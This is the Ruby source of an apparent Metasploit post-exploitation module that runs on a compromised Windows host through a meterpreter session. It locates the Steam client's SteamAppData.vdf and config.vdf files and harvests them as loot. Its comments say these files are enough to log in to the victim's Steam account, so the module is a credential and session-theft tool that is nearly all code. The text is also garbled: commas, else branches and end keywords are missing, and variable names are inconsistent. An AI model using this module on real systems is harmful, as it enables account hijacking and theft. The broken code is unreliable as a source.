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# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info(info,
'Name' => 'Windows Gather Steam Client Session Collector.',
'Description' => %q{ This module will collect Steam session information from an
account set to autologin. },
'License' => MSF_LICENSE,
'Author' => ['Nikolai Rusakov <nikolai.rusakov[at]gmail.com>'],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter' ]
# All that is needed to login to another Steam account is config.vdf,
# setting the AutoLoginUser to the proper username and RememberPassword
# to 1 in SteamAppData.vdf.
# Only tested on Win7 x64
# config.vdf , ContentCache element holds a K,V table of what appears
# to be UniqueID, Session. This is purely speculation as I have not
# reversed it to check. However the key is always unique to the account
# and the value changes whenever the account is logged out and then
# back in.
def run
steamappdata = 'SteamAppData.vdf'
steamconfig = 'config.vdf'
u_rx = /AutoLoginUser\W*\"(.*)\"/
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
# the correct program files folder.
# We will just use an x64 only defined env variable to check.
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = prog_files_env['ProgramFiles(X86)']
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
progs = progfilesx86 # x64
progs = progfiles_env['ProgramFiles'] # x86
path = progs + '\\Steam\\config'
print_status("Checking for Steam configs in #{path}")
# Check if all the files are there.
if directory?(path) && file?("#{path}\\#{steamappdata}") && file?("#{path}\\#{steamconfig}")
print_status("Located steam config files.")
sad = read_file("#{path}\\#{steamappdata}")
if sad =~ /RememberPassword\W*\"1\"/
print_status("RememberPassword is set! Accountname is #{u_rx.match(sad)[1]}")
scd = read_file("#{path}\\#{steamconfig}")
steam_app_data_path = store_loot('steam.config', 'text/plain', session, sad, filename=steamappdata)
print_good("The file SteamAppData.vdf has been stored on #{steam_app_data_path}")
steam_config_path = store_loot('steam.config', 'text/plain', session, scd, filename=steamconfig)
print_good("The file config.vdf has been stored on #{steam_config_path}")
print_status("Steam configs harvested successfully!")
print_error("RememberPassword is not set, exiting.")
print_error("Steam configs not found.")